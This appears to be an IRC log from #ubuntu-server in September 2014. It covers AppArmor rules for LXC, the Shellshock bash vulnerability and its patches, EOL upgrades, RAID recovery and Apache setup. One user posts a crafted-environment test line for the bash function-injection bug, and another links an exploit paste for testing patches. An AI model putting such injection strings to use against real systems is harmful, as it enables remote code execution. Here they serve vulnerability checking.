<jdstrand> what advanced use cases are broken?
<jdstrand> also, do these advanced use cases require adjusting the existing policy already?
<stgraber> well, for one, if I'm reading parsing the new policy properly, you're breaking my CI environment. I've got C programs using the LXC API which run under their own apparmor profile (so not unconfined) and then send signals and attach to the network namespace of existing containers.
<jdstrand> finally, you have alternate profiles for lxc-default-with-mounting and lxc-default-with-nesting, could add an additional profile for these advanced use cases
<stgraber> the signal change will block the former since the peer profile won't be unconfined and won't be lxc-start and the unix change will prevent me from setns + bind to an abstract socket if the process doing that is running under apparmor
<jdstrand> sure
<stgraber> so to me, this seems like we're pushing the user towards not running their management tools under apparmor
<jdstrand> so, we can have an additional profile for that
<jdstrand> to me, the management tools under apparmor are for less interesting than the conainer under apparmor
<jdstrand> but, that should certainly be supported
<jdstrand> (and it is, with either policy updates or adding an additional template)
<jdstrand> s/template/profile/
<stgraber> so the problem of the extra profile is that all existing containers will break on upgrade
<stgraber> what's the exact concern with allowing all incoming signals and all incoming unix socket connections?
<stgraber> we usually try to protect the host from the container, not the other way around
<jdstrand> it isn't a concern per se, it is security in depth
<jdstrand> today, it isn't going to do much because all containers run under the same profile name
<jdstrand> but, we should support running each container under its own profile, like how libvirt-lxc does it
<jdstrand> when that happens, one container will not be able to send signals to another container
<jdstrand> (of course, that already is happening with namespaces, but this is the security in depth I was talking about)
<jdstrand> stgraber: so, for today, we could adjust the signal rule to be: 'signal (receive),
<jdstrand> '
<stgraber> jdstrand: ok, so I'll nack the current patch and comment that I'll ack it if we make it "signal (receive)," and "unix (receive),". That'll address my concerns for now.
<jdstrand> stgraber: sure. that will limit 'send', which I think is quite worthwhile
<jdstrand> stgraber: also, if lxc does ever support per container profiles, maybe that is when we can introduce an additional profile template-- and it would have the more strict receive rule
<stgraber> jdstrand: so do those apply to the actual send() and recv() calls or does that only apply to bind()? because if the former, that makes the whole thing a bit pointless and then we'd have to allow both :)
<jdstrand> stgraber: unix rules have a whole slew of options include send, receive and bind
<jdstrand> (ie, the LSM hooks in all over the place)
<jdstrand> hallyn: let me get you a new debdiff in the bug
<stgraber> jdstrand: ok, so to confirm "unix (receive)," means that an outside process will be allowed to connect to any unix socket which the target (running the apparmor profile) has bound and then be able to have a regular bi-directional communication over it, but the processes running under the apparmor profile will not be able to bind to a socket which isn't running under that same profile, correct?
<hallyn> sigh, new debdiff?  guess i have to read the backlog
<hallyn> jdstrand: fwiw I was working with http://paste.ubuntu.com/8433668/
<hallyn> (which has the one additional rule on top of yours)
<stgraber> jdstrand: also, I hope that going forward once we get profile stacking and use apparmor namespaces, we can come up with more clever ways to protect the host based on the stack of namespaces (you can do whatever you want to your any child namespace but can't do anything to your parent kind of thing).
<jdstrand> stgraber: we'll see what that brings. profile stacking is very high on the todo list now
<stgraber> jdstrand: something like that would be far more generic and would actually align properly with what we want + it shouldn't matter then whether we run with the same profile for everything or if we have per-container profiles since we'd have per-container namespaces anyway
<jdstrand> I'm also thinking about container isolation in addition to host protection (if that wasn't clear)
<stgraber> I realize it'll still be a while before we can do that kind of advanced stuff (getting stacking to work at all is the main goal for now), but I've got hope that we can come up with a solution I'm actually fine with in $FUTURE
<hallyn> may i suggest that (a) apparmor is a different model than selinux and (b) the apparmor camp used to espouse its advantages;  this path feels like pursuing selinux away from the apparmor model (regardless of how i feel about eithe rmodel)
<jdstrand> profile composition is part of the stacking work
<hallyn> but anyway, i digress
<jdstrand> and it offers a number of interesting options, indeed
<jdstrand> hallyn: I don't quite follow your digression. there is more to life than just paths and we are still doing dynamic labelling
<jdstrand> :)
<jdstrand> we are not pursuing the selinux model. I'm sure if you had a drink with jj he'd be happy to discuss how we are different at great length :)
<jdstrand> but, LSMs being what they are, we need to work together with where the hooks live
<jdstrand> maybe it is that every process has its labelling in selinux and that I'd like containers to each have their own apparmor labelling that is the root of this
<hallyn> no it's the fact that apparmor around 2005 talked about the advantage of just protecting the host from untrusted network daemons, while selinux wanted everything confined
<jdstrand> heh
<jdstrand> well, this is 2014. things have changed
<jdstrand> :)
<jdstrand> we want to have a strong sandbox for untrusted code (appstore apps)
<hallyn> stgraber: your jenkins environment with the confined helper not being able to signal into a container is a real problem.  let's focus o nthat one
<jdstrand> and if we can't mediate access to the upstart abstract socket or those apps sending other apps signals, we kinda lost
<stgraber> hallyn: what we discussed with jdstrand will solve that, just waiting for the new debdiff
<hallyn> jdstrand: we have that, user namespaces :)  they are *the* way to finally, safely deal with setuid-root
<hallyn> oh.  i read backlog, but missed tha tsomehow
<hallyn> sounds good
<hallyn> lxc-test-unpriv passes with my debdiff, so as fara s i'm concerned long as it's based on mine you guys can push
<jdstrand> hallyn: I don't want to get into a containers vs apparmor thing here. there is overlap, there are applications for both and they can work together
<hallyn> jdstrand: aluto and i were actually talking about the dac.vs.mac thing in chicago...  it's deeper than one might hope
<stgraber> jdstrand: oh, another question about that patch which I asked on the ML earlier. Exactly what are we blocking wrt ptrace? The profile contains a whitelist so it's kinda hard to know what's meant to be blocked :)
<hallyn> we like to say dac and mac are orthogonal, but dac may not be able to subvert the mac in some cases
<hallyn> stgraber: yeah perhaps the container-base should have a commented list.  i'm not sure pointing at a wiki suffices here
<jdstrand> stgraber: the container can't trace other processes that run under a different label than @{profile_name}
<stgraber> jdstrand: ok, if that's the only thing which gets blocked, that's perfectly reasonable
<hallyn> jdstrand: so to be clear, you're taking the debdiff i posted above as your base?
<jdstrand> stgraber: actually, we also disable ptrace 'read' to outside the container
<stgraber> jdstrand: that's fine too
<jdstrand> hallyn: I am working off my portion of that. I was thinking I'd wrap all the apparmor stuff into a single debdiff so it could be uploaded alone and the new lxc release could come after
<jdstrand> hallyn: I could do something else, or you could take my debdiff and incorporate it
<hallyn> jdstrand: my debdiff just adds the one needed signal rule and fixes debian/rules to set the right apparmor version dep
<jdstrand> it also modifies the upstart job
<jdstrand> jobs*
<hallyn> my debdiff?
<jdstrand> look at the paste you gave me :)
<hallyn> oh.  oops.  that's bc i made the debidff after doing a debian/rules build
<hallyn> ok fine i'll just tweak yours when you're done
<TJ-> Is Canonical, Ubuntu, or Amazon responsible for updating Ubuntu AMI images that have the affected bash versions?
<mdeslaur> TJ-: utlemming is who you're looking for
<TJ-> mdeslaur: Thanks; a user just asked in #ubuntu but I wasn't clear who is responsible - so it is an Ubuntu responsibility?
<mdeslaur> TJ-: yes, canonical takes care of it, utlemming can give you the details when he gets here
<TJ-> thresh: mdeslaur has the answer
<thresh> yep, thank you.
<rcj> TJ-, Ubuntu updates those images.  We've have updated images for USN-2362-1/CVE-2014-6271 and are in the process of qualifying our images for CVE-2014-7169.  The archive mirrors have those package updates already of course.
<uvirtbot> rcj: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occ
<uvirtbot> rcj: GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients
<TJ-> thresh has a complete answer now :)
<thresh> yeah I guess it takes time for the images validation.
<thresh> thanks guys, appreciate it - amazon gave me time until monday to update my marketplace amis, so willing to do that sooner than later.
<jamespage> zul, coreycb: are either of you guys looking at updating the oslo.* packages to the upstream release versions?
<coreycb> jamespage, it's not on my list atm but I could add it
<jamespage> zul, gah upstream went 1.4.0.0a5 -> 1.4.0
<zul> jamespage:  i was going to
<jamespage> zul, what happened?
<zul> jamespage:  i updated most of them except for oslo.messaging
<zul> jamespage:  ill double check
<jamespage> zul, please do - I see most out-of-date compared to the upstream juno release that doug did
<jamespage> zul, I'm looking at messaging now
<zul> jamespage:  ack
<jamespage> zul, messaging 1.4.1 uploaded, looking at config now
<zul> jamespage:  oslo.18n is in proposed
<jamespage> zul, that and db are stuck on a keystone regression - still at b2?
<jamespage> wtf
<zul> yeah
<zul> jamespage:  leave it with me go enoy your weekend
<jamespage> zul, OK - I'll do the config I have in flight and leave the rest to you
<Phibs> is bash actually fixed yet ?
<Phibs> env ls='() { echo vulnerable; }' bash -c ls
<Phibs> seems not
<Phibs> http://www.ubuntu.com/usn/usn-2363-2/
<Phibs> says      bash 4.3-7ubuntu1.3  is fixed
<Phibs> but it is not
<sarnold> Phibs: that's an intentional feature of bash.
<jrwren> fixed for me.
<Phibs> bullshit
<Phibs> lol
<streulma> hello, amavis keeps crashing, and killed by SIGHUP
<Thorn> hello
<SCHAAP137> good afternoon
<Thorn> I have an 11.04 server that I need to patch for shellshock, but I can't even install build-essential, seems like repos are down
<rww> !11.04
<ubottu> Ubuntu 11.04 (Natty Narwhal) was the fourteenth release of Ubuntu. Desktop support ended on October 28, 2012. See !upgrade, !lts and !eol for more details.
<rww> !eolupgrade
<ubottu> End-Of-Life is the time when security updates and support for an Ubuntu release stop, see https://wiki.ubuntu.com/Releases for more information. Looking to upgrade from an EOL release? See https://help.ubuntu.com/community/EOLUpgrades
<sarnold> Thorn: 11.04 hasn't had security updates for nearly two years
<rww> probably best if you stick to LTS releases from now on
<Thorn> this is a web host vps and I probably can't upgrade it without purchasing a new vps
<rww> okay. it still hasn't been supported for two years.
<Thorn> and I'm pretty sure they didn't offer any LTS at that time... (that's not linode)
<sarnold> since 11.04's replacement has also been EOLed for a long time, upgrading that machine might take some real effort. buying a second vps for a day or two might be the cheapest and fastest way out of this.
<henkjan> shellshock may be the least of your problems on a 11.04 vm
<Thorn> ok thanks
<sarnold> good luck Thorn :)
<patdk-wk> isn't that vaunerable to heartbleed too?
<patdk-wk> or was it still using 0.98
<The_Tick> if I have a 10.10 box, what's the upgrade path to current? (14.04.1)?
<rww> 10.10 -> 11.04 -> 11.10 -> 12.04 -> 14.04.1
<The_Tick> no direct jump then? alright
<rww> i'd recommend a backup and reinstall, to be honest
<The_Tick> I'm really considering it
<The_Tick> do-release-upgrade is complaining about natty.tar.gz.gpg missing
<The_Tick> but I haven't checked the sources list yet
<rww> !eolupgrade
<ubottu> End-Of-Life is the time when security updates and support for an Ubuntu release stop, see https://wiki.ubuntu.com/Releases for more information. Looking to upgrade from an EOL release? See https://help.ubuntu.com/community/EOLUpgrades
<The_Tick> thanks
<The_Tick> oof ya this is on reiser
<The_Tick> time to contact the hosting company, whee
<The_Tick> thanks rww
<SthNotTaken> Is there a simple way to install JFreeChart which has Java Dependencies?
<Seannie> is this the channel i can ask about the bash exploit?
<sarnold> Seannie: sure, here or #ubuntu-hardened
<Seannie> did i read things wrong but the exploit affects as far back as 10.04?
<Seannie> is this just some smokescreen that allows the FBIs prism into what was once supposed to be a secure crowddriven o/s?
<sarnold> Seannie: probably all versions of ubuntu ever released; the bug was introduced roughly in 1996 or so.
<sarnold> Seannie: but 10.04 LTS is the oldest currently supported ubuntu, so that's as far back as we've prepared updates
<Seannie> ah
<Seannie> is this a canonical employee's lounge? hehe
<sarnold> it's a good mix of people here, some employees some not :)
<Seannie> so the bug was just a part of the way bash worked until it was discovered to allow root or other backdoor access, which was only just recently reported yesterday correct?
<Seannie> reported AND discovered?
<Seannie> or it always behaved that way, but now its a problem due to... something something something?
<sarnold> well, the flaw doesn't itself allow root exploits; how bash was used in many network-facing daemons is what really allowed things to get out of hand
<sarnold> as I understand the flaw, it was discovered and reported roughly one week ago; over the weekend some patches were prepared and tested, wider annoucements were made to software vendors monday and tuesday with the intent of releasing the patches wednesday.
<sarnold> once the patches were out in wider audiences on wednesday, that's when taviso found the fix developed over the weekend was insufficient
<sarnold> there was discussion during the weekend about changing bash's behaviour but everyone agreed that discussion needed to happen in public since it might mean breaking existing software
<Seannie> the suggestion the flaw is similar to heartbleed... spin for the microserf crowd?
<sarnold> nothing at all like heartbleed except that it can potentially affect a great many people in a highly visible way
<sarnold> heartbleed allowed people to look at random tiny pieces of server or client memory, and sometimes interesting things are stored there
<sarnold> these bash bugs allow executing nearly arbitrary code through a variety of services that were previously thought to be safe
<Seannie> such as, say, perhaps the freenode servers which detected unusual binaries?
<sarnold> .. but not everyone has those services configured in a way that would use bash
<sarnold> it's highly unlikely this bug was used for freenode compromise
<Seannie> is there evidence in the wild this exploit was taken advantage of?
<sarnold> as far as I know, no evidence at all from before wednesday; after wednesday, absolutely tons. it's relatively easy to work with this one, so the barrier to entry is very low. within hours people were seeing coordinated scanning evidence in their webserver logs.
<Seannie> business as usual since 14.04 was just out, and there are many updates frequently which I expect wont settle down for some time to come, yet this exploit for bash trended on my very non computer oriented facebook news feed, which i thought odd - is the increased reporting due to the ease of the exploit or the seriousness of what it could affect? Or is the reporting more a sign that Linux is growing more prevalent?
<sarnold> I suspect large ease of exploitation and seriousness
<Seannie> which the current patch partially addresses
<sarnold> the two patches we've currently integrated address the most pressing aspects of the fault; there are other outstanding issues that we'll patch early next week, and I hope there's some wider discussion about turning off this aspect of the bash parser entirely unless requested, similar to the patches prepared by netbsd: http://www.openwall.com/lists/oss-security/2014/09/26/22
<Seannie> does the bash exploit affect desktop home users?
<sarnold> it could, bash is used e.g. in the dhcpcd scripts, so a malicious dhcp server could cause trouble
<Seannie> hrm. my isp uses dhcp only
<Seannie> or no
<Seannie> i have it backwards
<sarnold> a home user is more likely to install a tool such as webmin or cpanel or other horrible web front-ends that provide many many opportunities for potential exploitation
#ubuntu-server 2014-09-27
<Seannie> thanks sarnold. I feel a lot better now.
<sarnold> you're welcome Seannie :) have  a good weekend
<lkthomas> hey guys, if I want to setup nfs server as public share folder, what should I aware for the permission part ?
<RiotBlasto__> I actually prefer Open Media Vault over Ubuntu for NFS, at least for personal use.
<lkthomas> RiotBlasto__: we are running single sign on, and we need to do something special on NFS server itself
<RiotBlasto__> @lkthomas: I haven't setup an nfs in 3 or 4 years so don't remember. NFS servers are usually simple setup and go with minor changes.    If you haven't gone through this yet already, check out the link below. You should be good if you cover everything in it + all the resources linked in there:  https://help.ubuntu.com/community/SettingUpNFSHowTo
<Phibs> is there an elegant way to get the dpkg -l output to show me what repo the package was installed from
<lkthomas> Phibs: there is something call apt policy..etc, maybe Google it
<Phibs> yeah, I wanted a single cmd
<Phibs> found that though, thanks
<lkthomas> :)
<lordievader> Good morning.
<zune^> hey anyoner who is has used a nis setup on multiple vm's with ubuntu in a home envirement.
<Castbound> hello, I have Ubuntu 11.04 \n \l , is it possible to upgrade from command line without reimage?
<cfhowlett> !eolupgrade | Castbound
<ubottu> Castbound: End-Of-Life is the time when security updates and support for an Ubuntu release stop, see https://wiki.ubuntu.com/Releases for more information. Looking to upgrade from an EOL release? See https://help.ubuntu.com/community/EOLUpgrades
<tiblock> Hi. When shellshock was discovered, i upgraded and rebooted mine 3 servers, but then second update released, i again installed and rebooted mine servers with online users on it, now i see new update. Do i need repeat it again?
<cfhowlett> tiblock, yes
<Thumpxr> Is there a way to automount multiple smb:// shares at boot/logon? User/Password protected.
<Thumpxr> damn wrong channel
<tiblock> cfhowlett, can i see test exploit to see how it works for second update?
<cfhowlett> tiblock, over my of understanding.  the 2nd patch fixed the shortcomings of the 1st patch, as I understand it.
<tiblock> cfhowlett, but now 2nd patch hacked too and now heres is 3rd patch. Where i can get exploit for 2nd patch to test it on other linux distros?
<cfhowlett> tiblock, I don't know such things.  sorry.
<cfhowlett> tiblock, ##linux would probably know
<tiblock> Here is exploit for second patch if somebody need to test http://pastebin.com/2RMmjpCh it will execute "echo date" if it works
<tiblock> *for first patch
<bilde2910> Hi! My 14.04 server doesn't want to apt-get upgrade. This is the error I get: http://paste.ubuntu.com/8441170/ - given the "gzip: stdout: No space left on device", here's the output of df: http://paste.ubuntu.com/8441181/ - any help on this? I'm afraid to restart my system in fear that it might not boot.
<bilde2910> /boot seems to be filled with a lot of old files, but can I delete any of them safely? http://paste.ubuntu.com/8441203/
<cfhowlett> bilde2910, yes.  sudo apt-get autoremove
<cfhowlett> bilde2910, that will remove all but the two most recent kernels
<bilde2910> Thank you, cfhowlett, I will try that
<cfhowlett> bilde2910, also         sudo apt-get clean will clean out your .cache of downloaded .debs
<bilde2910> This worked great! Saved my day
<bilde2910> Thanks
<Norlander> Anyone knowledgeable in ubuntu-vm-builder error messages? I don't
<Norlander> understand why the creation of my VM guest is failing... :S
<iDealz> Anyone have any experience with recovering a RAID 5 array with one failed drive using MDADM?  It asks me if I want to boot into a degraded raid environment but whether I hit y/N it seems to do the same thing.  Loads an initramfs prompt
<qman__> you could try rebuilding from a live environment
<qman__> it's possible your failed drive contained your /boot
<iDealz> I should preface this with my skill level; Noob
<iDealz> shouldnt
<iDealz> have os on ssd drive
<qman__> it's also possible that the bit that tries to ask you what to do is broken
<qman__> I've had a lot of trouble with it in the past regarding fsck questions
<hurin> hi everybody
<qman__> anyway
<iDealz> doesnt sound promising
<qman__> you could boot any live linux environment and use mdadm within it to add a new drive to the array
<qman__> then let it rebuild
<qman__> then attempt to reboot
<iDealz> how do you boot it live?
<qman__> a live USB or CD or DVD
<qman__> like you did when you installed in the first place
<iDealz> ah
<qman__> only instead of isntalling, drop to a shell, and use mdadm
<iDealz> that wont effect data on existing array?
<qman__> that depends on what you do within that environment
<qman__> merely booting it won't do a thing
<qman__> adding a new disk to the array will cause it to rebuild
<qman__> following the install procedure would overwrite your data with a new install (not what you want)
<iDealz> do you need to do anything to remove the broken disk?
<qman__> if mdadm is complaining at boot time, it's already removed
<qman__> logically speaking
<qman__> make sure you have the right one
<qman__> another thing you can try is booting to "recovery mode" from grub
<qman__> though that may or may not work
<qman__> the idea here is you need to get a working linux environment from which to run the mdadm tools
<iDealz> makes sense, wasnt sure what I could do from the initramfs prompt so I just powered off
<qman__> can't do much from there
<qman__> if recovery mode gets you to a root shell, it'll work
<qman__> if not you'll have to boot from CD/DVD/USB/network/whatever
<iDealz> ty qman
<iDealz> once I get to the point of being in the root I'll probably be back with more questions =)
<qman__> I personally prefer SystemRescueCD for that sort of thing, as the recovery shell in the ubuntu installer is kind of awkward
<qman__> sure
<qman__> but the ubuntu one will work
<iDealz> from what I've read you really only get one shot at recovering the array
<iDealz> so dont want to mess it
<iDealz> *up
<qman__> pretty much
<qman__> RAID 5 is not particularly robust
<iDealz> 4TBs of data lost would be sad to say the least
<iDealz> may need to reconsider setup
<qman__> if you're lucky enough that only one drive failed, it's probably going to recover ok
<qman__> but the fact that it won't boot isn't promising
<iDealz> looks like just one, only shows 3 drives in boot menu
<iDealz> so one is completely hosed
<iDealz> probably why they recommend not using cheap drives for RAID set up
<iDealz> think the one that dies was WD Green
<qman__> the reason desktop drives shouldn't be used in RAID is because, in the event of an error, they can sit there lagging out forever and drop out of the array
<qman__> drives designed to be used in a RAID will give up after 7 seconds
<iDealz> ahh
<qman__> the generally low quality doesn't help much either
<qman__> but that's the specific reason not to do it
<iDealz> any drive you recommend?
<iDealz> my others are WD Reds
<qman__> I've had good luck with WD reds
<qman__> they're not fast but they are pretty reliable
<qman__> and they are designed to be used in RAID
<iDealz> this is my first attempt at Linux and a RAID setup so its a bit daunting
<iDealz> havent used a command line os since DOS
<qman__> I don't recommend RAID 5 at all though, it only still works in niche cases
<qman__> for some good reading on the reasons why, check this out: http://community.spiceworks.com/topic/356486-why-is-raid5-so-bad
<iDealz> do you recommend 6?
<qman__> not particularly
<iDealz> oh LOL
<qman__> raid 6 fixes some of the reliability problems of raid 5 at the expense of a drastic performance decrease
<qman__> if you want reasonable performance and reliability, I recommend raid 10
<iDealz> how many redundant drives in raid 10?
<qman__> raid 10 is striping across mirrored pairs
<qman__> so the result is, the "wrong" two drives can take you out, but the "right" N drives won't
<iDealz> I've been debating if I even need RAID... it seems like for my purposes it might be more trouble than its worth.  Although I like have some type of redundancy
<qman__> well, it's important to note that RAID is not backup
<qman__> RAID is for uptime and convenience
<qman__> and in some cases performance
<qman__> if uptime isn't that important to you, it may be better to spend the money on backup drives instead
<iDealz> solid advice
<iDealz> I just use my server for backing up my desktop and laptops and as a media server
<iDealz> before I went RAID just having separate drives worked fine but I got to worry about a drive failure
<iDealz> *worrying
<qman__> well, as you saw, all drives will fail eventually
<iDealz> indeed
<qman__> a simple two-disk raid-0 for speed, and a couple backup drives you rotate, may be a better solution for you
<iDealz> how do you mean rotate?
<qman__> or even just a few disks without any RAID
<qman__> rotate, as in, you back up your data to one disk, unplug it and store it elsewhere, and plug in the other one
<qman__> next week, switch them
<qman__> repeat
<iDealz> ah
<iDealz> this will be the dumbest question you hear all day, but for backing up you need the exactly the same size space right... 1GB to 1GB ratio?
<qman__> that method only works well for volumes of data that fit on a single external hard drive, though
<qman__> yes, for everything you want backed up
<qman__> there are ways of compressing or deduplicating your data to get a little more out of it
<qman__> but generally that's how it goes
<iDealz> well I guess the silver lining is the price of drives are almost back down to reasonable prices
<iDealz> so I guess I can get a 4TB drive, fix my array backup to the 4 TB drive and then wipe the array drives?
<qman__> you could do that
<qman__> I would make sure to do some testing on that new drive before you do the wipe
<qman__> keep in mind also that as long as it's plugged in, that external drive could just as easily fail, so the idea is to keep a copy turned off
<qman__> and preferably unplugged, in a box, in some other room or building
<iDealz> I do have an external 4 TB drive, but it seems like it would take an eternity to move the data from the array to the external drive
<iDealz> motherboard doesnt have a USB 3.0 out unfortunately
<qman__> that will probably take a long time the first time
<qman__> the good news is that if your data doesn't change a ton day to day, you can use a tool like rsync to simply 'update' the backup copy
<qman__> which would normally have a lot less data to transfer than a full backup
<iDealz> yes
<iDealz> doesnt change a tremendous amount
<iDealz> alright, sounds like i have to go dig up my boot disc
<iDealz> thanks again qman
<dasjoe> I'd recommend either raid6 or, as an (unsupported but still "production ready") alternative, taking a good look at ZFS
<qman__> ZFS is very cool, but it has some hefty hardware requirements
<dasjoe> It's okay, I'm running it on a laptop from 2010 right now
<qman__> I would not attempt to run ZFS without server grade hardware top to bottom
<hurin> hi o/
<hurin> i'm on a ubuntu 14, triyng to set up a virtual host, without success, could anyone give me some hints here ?
<hurin> i already checked my log, without seing anything, whatever i do, i keep getting only my default page,...
<teward> hurin: virtual host for..?
<hurin> my apache2 server
<hurin> i followed this tutorial => https://help.ubuntu.com/14.04/serverguide/httpd.html
<hurin> and this one too => http://blog.code4hire.com/2011/03/setting-up-virtual-hosts-for-apache-on-ubuntu-for-local-development/
<hurin> here's the configuration of my virtual host (in /etc/apache2/sites-available/test.com.conf ) => <VirtualHost *:80>         ServerAdmin admin@test.com         ServerName test.com         ServerAlias www.test.com         DocumentRoot /var/www/test.com/public_html          LogLevel warn          ErrorLog ${APACHE_LOG_DIR}/error.log         CustomLog ${APACHE_LOG_DIR}/access.log combined  </VirtualHost>
<hurin> i'm really lost here, i don't know what i did wrong, i'm usually working on a centOs, and never had any problem with apache or any virtual host, i really don't knwo what to do >___<
<hurin> well, i don't know exactly why, but i made a service apache2 stop and a service apache2 start, instead of doing a service apache2 restart as usual, and that's working O_o
<hurin> ok, i think i'm starting to understand what i did wrong, if i let the 000-default.conf, and, even if you make a a2dissite 000-default.conf, you have to make a service apache2 restart (and not a reload), and then, it's working :)
<maxb> how odd, that shouldn't be neccessary
#ubuntu-server 2014-09-28
<hurin> ok, have a nice day o/
<computer1> hi i am having some issues installing ubuntu really need help :(
<computer1> i have an error report...
<computer1> http://fpaste.org/137075/
<computer1> please help :(
<computer1> http://pastebin.com/PvTevdRi
<computer1> http://fpaste.org/137075/
<computer1> any ideas where i could get some assistance?
<clepto> i have slow lan speeds currently. every test i have done shows i should be able to do gigabit but im stuck at 100mb. i have a pastebin of some of the diagnostics i did here...  http://pastebin.com/2y8hzsN6
<clepto> im not running the specific server build but i am running it as a headless unit and managing over SSH any help would be appreciated.
<clepto> also its 14.04.1 i think
<clepto> yeah 14.04.1 LTS
<computer1> clepto please us tell more about your problems..
<bekks> computer1: Does the switch your headless unit is connected to support Gigabit, too? As well as the cable used?
<clepto> computer1: my lan wont run at gigabit speeds. i have a cat5e cable i have a gigabit router and a gigabit network card. but it will only run at 100 mbit
<clepto> my network card is a RTL8111/8168/8411 PCI Express Gigabit Ethernet Controller
<clepto> computer1: what other information would be useful? i was running at gigabit under Mint 13 but i chamged  to ubuntu 14.04.1 and it hasnt worked right since
<clepto> bekks: yes it does.
<computer1> did you make sure that your Ubuntu machine is not running updates or other chores in the background?  Monitor with top or htop.
<clepto> yes, its not according to ethtool its only running at 100mbit
<computer1> did you make sure your cabling and connections are Cat6? Although Cat5e can handle gigabit traffic (350 MHz bandwidth), Cat6 is really needed to ensure full duplex performance.
<Gregor3000> hello, if i install on 4GB PC with about 300MB or 512MB swap parittion does the swap partition actually get used?
<clepto> computer1: no i dont have cat6 cable i only have 5e but as i stated it was working before on mint13. im not to worried about full capability but im using it as a file server. and 10 MB transfer speeds is stupidly slow
<clepto> computer1: i was getting 100MB transfiers before i changed to ubuntu
<bekks> Gregor3000: You'll need swap == RAM when your are going to use hibernation/suspend.
<computer1> do the linux drivers for your network card need tweaking or are too generic to support higher bandwidth?
<clepto> computer1: i honestly dont know. i am a bit noobish
<Gregor3000> besides from that? and on a server. it will have /swap later when disks arrive, but for now i will try the server out on USB. and i was thiking of going with small /swap and am i correct in assuming that swap will not actualyl be used much at all (until it goes into hibernation)
<Gregor3000> ok i see i can just reduce swapiness to 10 and it should start usign /swap when ram is occupied 90% which i doubt it will happen over test
<lordievader> Good morning.
<Norlander> Anyone knows the name of an application/script that reads a log-file and creates a www-link for it that one can refer to when troubleshooting a system?
<Norlander> Please send a PM..
<bekks> !pastebin | Norlander
<ubottu> Norlander: For posting multi-line texts into the channel, please use http://paste.ubuntu.com | To post !screenshots use http://imgur.com/ !pastebinit to paste directly from command line | Make sure you give us the URL for your paste - see also the channel topic.
<gregor3000> ive installed server to USB stick from Cd rom on my desktop. i then moved the USB stick to the server and booted, but it can't connect to network it just says on boot that it's waiting for network  configuration and then it botos without it
<gregor3000> problem is i do not have USb keboard to troubleshoot on the server, so i can only see what happens on it
<bekks> gregor3000: Without a keyboard, you cannot fix it.
<gregor3000> i can not check any files over there. so i moved the usb Stick back to desktop and when i check 70-persistent.net.rules
<gregor3000> i can see the mac address is from desktop
<gregor3000> i tried deleting the file hoping the server will solve it bz itself on boto but doesn-t seem it helped
<gregor3000> well i am stuck then. any logs i could check maybe?
<gregor3000> it is a software erro though, right?
<bekks> gregor3000: the solution would have been to replace the desktop MAC with the server MAC.
<gregor3000> i guess i need to buy one then
<bekks> ?
<bekks> you dont have to buy anything to replace a mac a ddress in a text file.
<bekks> *file
<lordievader> I think he is talking about a keyboard.
<bekks> The mac address is to be found on a small sticker somewhere on or in the server and the text file can be created/edited on the desktop.
<bekks> Just deleting that file will not help.
<gregor3000> ah... let me check the box then.
<gregor3000> there is onlz serial number and PID
<gregor3000> aha its on motherboard but hard to see
<gregor3000>    hmm anything else thta needs to be changes in some other place maybe? i i changed the mac. wife was able to read it from the motherboard
<gregor3000> i then saved that file and still the same thing. i installed SSH server hoping i could later do it all over network...
<bekks> gregor3000: Do you have a DHCP server running in your network?
<gregor3000> modem/router is asigning IP's. so far i only installed servers into virtualbox to try it out and used bridged conneciton there. it all worked automatically there
<gregor3000> DHCP is hwo IPs are sssigned
<gregor3000> server has some option to change mac or soething liek that i only saw it really fast on boot
<gregor3000> if this is juts a software OS issue it is not such a porblme as i know i can solve it in soem way but if this show to possiblel hardware issue then i am concerned
<gregor3000> i rebooted back on desktop and well now the connection is gone there as well. however i did see that it atuomatically asigned eth1 with the mac address form the desktop. and probably with a few commands i could get the network there back. the qeustion is why the server network is not working.... hmmm. ok need to eat now. maybe i will continue troubleshooting later on
<gregor3000> by for now
<gregor3000> bye
<RoyK> any idea how to get bugs like bug 1171945 or 1364091 fixed upstream? Both contain fixes, and the former has had a working fix attached for over a month now
<uvirtbot> Launchpad bug 1171945 in mdadm "Nested RAID levels aren't started after reboot" [Undecided,Confirmed] https://launchpad.net/bugs/1171945
<RoyK> bug 1364091 is rather nasty too...
<uvirtbot> Launchpad bug 1364091 in mdadm "Possible RAID-6 corruption" [Undecided,Confirmed] https://launchpad.net/bugs/1364091
<aandy> hi guys. i have what appears to be an odd request, and i can't figure out what to search for, so if someone knows what it's called, i'd appreache the pointer :) i have a LAN, with a DHCP and according LAN ip range. i want an interface to "pretend" to be a certain IP (out of bounds of LAN), similarly to what an arpspoofing (lan only) would do, or a ifconfig alias (localhost only?). i'd just route that ip through the specific interface, but the problem
<bastidrazor> sudo mount -t cifs //192.168.0.21/Music /mnt/Music -o user=user,password=password  .. windows shared folder attempting to mount on my server. I get mount error(13): Permission denied.
<lordievader> bastidrazor: Is the user allowed to read that mount?
<bastidrazor> lordievader: yes, the username provided is the owner of the shared folder. also the /mnt/Music is rwx for all
<bastidrazor> lordievader: also owned by the user attempting to mount.
<bastidrazor> lordievader: before i installed cifs-utils i was getting a :could not mount block device read-only
<lordievader> Is the host a Windows machine or a Linux machine?
<bastidrazor> host is windows 7. server is 14.04
<lordievader> The one providing the share is that Windows or Linux?
<bastidrazor> windows
<lordievader> bastidrazor: Does /var/log/syslog tell you anything more about the permission denied?
<bastidrazor> Sep 28 13:24:18 servitude kernel: [13537.409185] Status code returned 0xc000006d NT_STATUS_LOGON_FAILURE
<bastidrazor> Sep 28 13:24:18 servitude kernel: [13537.409206] CIFS VFS: Send error in SessSetup = -13
<bastidrazor> Sep 28 13:24:18 servitude kernel: [13537.409550] CIFS VFS: cifs_mount failed w/return code = -13
<lordievader> !paste | bastidrazor
<ubottu> bastidrazor: For posting multi-line texts into the channel, please use http://paste.ubuntu.com | To post !screenshots use http://imgur.com/ !pastebinit to paste directly from command line | Make sure you give us the URL for your paste - see also the channel topic.
<lordievader> NT_STATUS_LOGON_FAILURE
<bastidrazor> my windows credentials are wrong?..
